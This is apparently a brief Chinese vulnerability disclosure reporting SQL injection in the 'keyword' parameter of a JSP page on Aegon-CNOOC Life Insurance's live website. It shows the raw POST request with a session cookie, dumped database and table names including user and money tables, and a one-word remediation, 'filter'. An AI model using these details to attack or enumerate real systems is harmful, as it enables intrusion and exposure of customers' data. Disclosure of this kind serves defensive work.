海康人寿主站SQL注射SQL注入漏洞
POST /photography/look.jsp HTTP/1.1
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Referer: http://www.aegon-cnooc.com.cn:80/
Cookie: JSESSIONID=3BE229551343BCD8E7853360EED83F51
Host: www.aegon-cnooc.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
keytype=1&keyword=1
注射参数keyword
Database: children [11 tables] +---------------------------------------+ | aoyun_user | | gold_info_in | | gold_info_out | | inoldperson_user | | money_user | | oldperson_user | | photography_user | | question_answer | | shandong_user | | user | | user_liuyan | +---------------------------------------+ Database: information_schema [16 tables] +---------------------------------------+ | CHARACTER_SETS | | COLLATIONS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLUMNS | | COLUMN_PRIVILEGES | | KEY_COLUMN_USAGE | | ROUTINES | | SCHEMATA | | SCHEMA_PRIVILEGES | | STATISTICS | | TABLES | | TABLE_CONSTRAINTS | | TABLE_PRIVILEGES | | TRIGGERS | | USER_PRIVILEGES | | VIEWS | +---------------------------------------+ 解决方案: 过滤